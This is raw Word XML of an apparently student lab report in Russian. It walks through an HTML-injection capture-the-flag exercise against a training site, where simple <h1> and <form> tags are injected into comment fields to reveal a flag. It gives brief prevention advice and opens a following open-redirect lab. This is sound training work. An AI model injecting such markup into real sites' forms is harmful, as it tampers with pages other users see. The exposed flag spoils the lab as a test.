      </w:r>
    </w:p>
    <w:p w14:paraId="00000006" w14:textId="02FD4D7C" w:rsidR="00B43243" w:rsidRPr="006B3AE2" w:rsidRDefault="007E62E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="a9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6B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="002C145A" w:rsidRPr="006B3AE2">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="00A928"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://51.250.73.193:8082</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A924CD6" w14:textId="77777777" w:rsidR="0059648B" w:rsidRPr="006B3AE2" w:rsidRDefault="0059648B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00000007" w14:textId="21D93534" w:rsidR="00B43243" w:rsidRPr="006B3AE2" w:rsidRDefault="007E62E6" w:rsidP="00D325AD">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind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Описание действий</w:t>
      </w:r>
      <w:r w:rsidR="00D325AD" w:rsidRPr="006B3A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решение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AA32F0E" w14:textId="4729FBFE" w:rsidR="00795355" w:rsidRPr="006B3AE2" w:rsidRDefault="00795355" w:rsidP="004C597A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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Заходим на объект тестирования по предоставленному адресу</w:t>
      </w:r>
      <w:r w:rsidR="00090DFF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(1)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08A88C6" w14:textId="3CB13081" w:rsidR="00FC0A66" w:rsidRPr="006B3AE2" w:rsidRDefault="00FC0A66" w:rsidP="00795355">
      <w:pPr>
        <w:spacing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Мы видим сайт, в котором есть какой-то пост, форма поиска, комментарии, форма для отправки новых комментариев</w:t>
      </w:r>
      <w:r w:rsidR="00090DFF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(2)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EE5C77D" w14:textId="77777777" w:rsidR="00D325AD" w:rsidRPr="006B3AE2" w:rsidRDefault="00FC0A66" w:rsidP="00D325AD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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соответствии с условиями данный сайт уязвим для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HTML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Injection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3A8D051" w14:textId="66BDEACE" w:rsidR="00AA5AF3" w:rsidRPr="006B3AE2" w:rsidRDefault="004E4B9C" w:rsidP="00D325AD">
      <w:pPr>
        <w:spacing w:after="240"/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реализации атаки необходимы какие-либо формы ввода. Из форм ввода на сайте имеется: поиск, имя, </w:t>
      </w:r>
      <w:r w:rsidR="00E14217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эл. почта</w:t>
      </w:r>
      <w:r w:rsidR="00687C5E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комментарии.</w:t>
      </w:r>
      <w:r w:rsidR="00F11B08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Необходимо проверить все эти формы на примере простого тега &lt;</w:t>
      </w:r>
      <w:r w:rsidR="00AA5AF3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h</w:t>
      </w:r>
      <w:r w:rsidR="00AA5AF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="00F11B08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  <w:r w:rsidR="004C597A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F11B08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при введении этого тега в форму </w:t>
      </w:r>
      <w:r w:rsidR="00AA5AF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вывод </w:t>
      </w:r>
      <w:r w:rsidR="00F11B08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текст</w:t>
      </w:r>
      <w:r w:rsidR="00AA5AF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а на экран</w:t>
      </w:r>
      <w:r w:rsidR="00F11B08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будет</w:t>
      </w:r>
      <w:r w:rsidR="00AA5AF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большим, значит тег сработал</w:t>
      </w:r>
      <w:r w:rsidR="001D06A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1D06A3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HTML</w:t>
      </w:r>
      <w:r w:rsidR="001D06A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D06A3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Injection</w:t>
      </w:r>
      <w:r w:rsidR="001D06A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получилась</w:t>
      </w:r>
      <w:r w:rsidR="00AA5AF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0205754" w14:textId="53C32A00" w:rsidR="00AA5AF3" w:rsidRPr="006B3AE2" w:rsidRDefault="00AA5AF3" w:rsidP="00D325AD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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При введении тега в форму поиска результата нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44178C88" w14:textId="105ED1FD" w:rsidR="005E0314" w:rsidRPr="006B3AE2" w:rsidRDefault="00AA5AF3" w:rsidP="00795355">
      <w:pPr>
        <w:spacing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Введём этот тег одновременно с разным текстом в три поля для блока комментарии</w:t>
      </w:r>
      <w:r w:rsidR="005E0314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нажмём опубликовать</w:t>
      </w:r>
      <w:r w:rsidR="00090DFF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(3)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2F7BD57" w14:textId="77777777" w:rsidR="005E0314" w:rsidRPr="006B3AE2" w:rsidRDefault="005E0314" w:rsidP="00D325AD">
      <w:pPr>
        <w:spacing w:after="240"/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В поле “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e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mail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” требуется ввести текст в определённом формате, в данном случае это поле недоступно для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HTML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Injection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7BBD54B" w14:textId="77777777" w:rsidR="005E0314" w:rsidRPr="006B3AE2" w:rsidRDefault="005E0314" w:rsidP="00D325AD">
      <w:pPr>
        <w:spacing w:after="240"/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HTML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Injection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сработала для формы “имя” и “комментарии” – эти формы уязвимы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012F1ED7" w14:textId="0B9FC6CB" w:rsidR="00AA5AF3" w:rsidRPr="006B3AE2" w:rsidRDefault="005E0314" w:rsidP="00F30FB9">
      <w:pPr>
        <w:spacing w:after="240"/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Необходимо внедрить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HTML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-код в форму для получения флага</w:t>
      </w:r>
      <w:r w:rsidR="004C597A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этого в комментариях напишем &lt;</w:t>
      </w:r>
      <w:r w:rsidR="004C597A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form</w:t>
      </w:r>
      <w:r w:rsidR="004C597A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  <w:r w:rsidR="00892E85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Ah</w:t>
      </w:r>
      <w:r w:rsidR="00892E85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!</w:t>
      </w:r>
      <w:r w:rsidR="004C597A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&lt;/</w:t>
      </w:r>
      <w:r w:rsidR="004C597A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form</w:t>
      </w:r>
      <w:r w:rsidR="004C597A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90DFF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(4).</w:t>
      </w:r>
      <w:r w:rsidR="00AA5AF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</w:p>
    <w:p w14:paraId="01E04058" w14:textId="278B6379" w:rsidR="004E4B9C" w:rsidRPr="006B3AE2" w:rsidRDefault="006E1CE2" w:rsidP="00F30FB9">
      <w:pPr>
        <w:spacing w:after="240"/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Наглядные пояснения на изображениях ниже.</w:t>
      </w:r>
      <w:r w:rsidR="00AA5AF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F11B08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1ACC177E" w14:textId="77777777" w:rsidR="00D325AD" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF2DB8" w:rsidP="00D325A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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Отобразившейся флаг</w:t>
      </w:r>
      <w:r w:rsidR="00090DFF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(5)</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2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23CE4C6" w14:textId="02308788" w:rsidR="00DF2DB8" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF2DB8" w:rsidP="00D325A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flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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{Htm1_1nj3ct10n_$0lut10n_fl@g}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731AAEB4" w14:textId="77777777" w:rsidR="00DF2DB8" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF2DB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B65A52" w14:textId="61563B7E" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC83D7" w14:textId="09E942DA" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="001D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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568B77DA" wp14:editId="74268A6E">
            <wp:extent cx="5733415" cy="428625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EEEB" w14:textId="7A516383" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F638311" w14:textId="0D894ED8" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71639D27" w14:textId="1D6C0EBF" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="001D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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557E814A" wp14:editId="3794C124">
            <wp:extent cx="5733415" cy="32385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3F3D" w14:textId="67A25EA7" w:rsidR="006E1CE2" w:rsidRPr="006B3AE2" w:rsidRDefault="006E1CE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2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t>Введём текст в теге &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ah</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>!&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1&gt; и затем без тега – “</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ah</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2!”, чтобы наглядно посмотреть разницу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16109F" w14:textId="78888970" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290D7A2F" w14:textId="19FF7FA6" w:rsidR="00A17925" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr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6B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C5280" w14:textId="2973E8AF" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00892E85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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522B8600" wp14:editId="100696CB">
            <wp:extent cx="5733415" cy="3838575"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525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A3EA" w14:textId="68054CC9" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5F96A9" w14:textId="470504B0" w:rsidR="002941F7" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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4) </w:t>
      </w:r>
      <w:r w:rsidR="002941F7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внедр</w:t>
      </w:r>
      <w:r w:rsidR="00BD1557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ение</w:t>
      </w:r>
      <w:r w:rsidR="002941F7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941F7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HTML</w:t>
      </w:r>
      <w:r w:rsidR="002941F7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-код в форму для получения флага</w:t>
      </w:r>
      <w:r w:rsidR="00BD1557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5FC03FCA" w14:textId="61F5D505" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF2DB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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2EF9FC3B" wp14:editId="1126220A">
            <wp:extent cx="5733415" cy="3771900"/>
            <wp:effectExtent l="0" t="0" r="635" b="0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B2BC" w14:textId="360F25F2" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00A17925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08799C" w14:textId="5A10104F" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF2DB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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354E948C" wp14:editId="6A1CDB9A">
            <wp:extent cx="5733415" cy="424815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ECBE" w14:textId="33012352" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB4C2A7" w14:textId="2A9C4D8C" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00E86FE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B920989" w14:textId="7BAAA67F" w:rsidR="00D13013" w:rsidRPr="006B3AE2" w:rsidRDefault="00D13013" w:rsidP="00556471">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"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Рекомендации, к</w:t>
      </w:r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ак избежать HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC25643" w14:textId="77777777" w:rsidR="00F331ED" w:rsidRPr="006B3AE2" w:rsidRDefault="00F331ED" w:rsidP="00F331ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C847EAB" w14:textId="15F68865" w:rsidR="00D13013" w:rsidRPr="006B3AE2" w:rsidRDefault="00D13013" w:rsidP="00D13013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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Этот тип инъекционной атаки происходит, когда ввод и вывод не проверены должным образом. Основным правилом предотвращения HTML-атаки является соответствующая проверка данных, каждого ввода разработчиком и тестировщиком.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4957B546" w14:textId="2694BD35" w:rsidR="00E86FE6" w:rsidRPr="006B3AE2" w:rsidRDefault="00D13013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B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Обычно проверяется, содержит ли код какой-либо специальный скрипт или скобки </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt; &lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;, &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt; &lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332B4EDB" w14:textId="128CC373" w:rsidR="00075C60" w:rsidRPr="006B3AE2" w:rsidRDefault="00075C60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3D32BBEA" w14:textId="5E5FCF21" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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1C9A1E00" w14:textId="5F7DA6E3" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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727837D7" w14:textId="09032A18" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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59729F47" w14:textId="1D55485A" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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6BC56B33" w14:textId="0FAE80D0" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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349053A6" w14:textId="1FE5E7F7" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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5200AE58" w14:textId="7F2D47F9" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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072F0BC7" w14:textId="32E38F8F" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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5F07389D" w14:textId="3313CCCE" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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19A4D8A6" w14:textId="64181BAA" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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0BEA2DEA" w14:textId="31F025BA" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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64E4217E" w14:textId="1EE5BF35" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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6EE52553" w14:textId="67D5CF85" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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10871097" w14:textId="77777777" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F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26EDE8E9" w14:textId="100CFCC0" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F" w:rsidP="00D0608F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="336" w:lineRule="atLeas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B3A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Лабораторная работа </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3A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№ </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3A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14.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208BB53" w14:textId="5019E99C" w:rsidR="00D0608F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D0608F" w:rsidP="00D0608F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="336" w:lineRule="atLeas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B3A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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3A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Open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3A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B3A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Redirect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3A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”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D23F1CC" w14:textId="36FFD6B5" w:rsidR="00874416" w:rsidRPr="006B3AE2" w:rsidRDefault="00874416" w:rsidP="00874416">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDCAF0E" w14:textId="7F799D1E" w:rsidR="00874416" w:rsidRPr="006B3AE2" w:rsidRDefault="00874416" w:rsidP="00CB78B1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567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>Открытое перенаправление</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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– </w:t>
      </w:r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>это уязвимость, которая позволяет злоумышленникам использовать вашу деловую репутацию для повышения эффективности фишинговых атак</w:t>
      </w:r>
      <w:r w:rsidR="00CB78B1" w:rsidRPr="006B3AE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для того</w:t>
      </w:r>
      <w:r w:rsidR="00715611" w:rsidRPr="006B3AE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</w:t>
      </w:r>
      <w:r w:rsidR="00CB78B1" w:rsidRPr="006B3AE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чтобы обманом завладеть вашими данными.</w:t>
      </w:r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B78B1" w:rsidRPr="006B3AE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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB78B1"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>лоумышленник</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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может отправить фишинговое электронное письмо, содержащее ссылку с вашим доменным именем, и жертва будет перенаправлена с вашего веб-сервера на сайт злоумышленника.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DCD810" w14:textId="17677884" w:rsidR="00075C60" w:rsidRPr="006B3AE2" w:rsidRDefault="00075C60" w:rsidP="00D0608F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B035BA" w14:textId="77777777" w:rsidR="00BB4760" w:rsidRPr="006B3AE2" w:rsidRDefault="00BB4760" w:rsidP="00BB4760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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77872555" w14:textId="77777777" w:rsidR="00BB4760" w:rsidRPr="006B3AE2" w:rsidRDefault="00BB4760" w:rsidP="00D0608F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349E340E" w14:textId="54557FFE" w:rsidR="00BB4760" w:rsidRPr="006B3AE2" w:rsidRDefault="00BB4760" w:rsidP="00BB4760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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>В связи с пандемией мы решили перенести наш магазин в онлайн. Получился сайт: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006B3AE2">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="000000" w:themeColor="text1"/>
          </w:rPr>
          <w:t>http://51.250.73.193:8081 </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
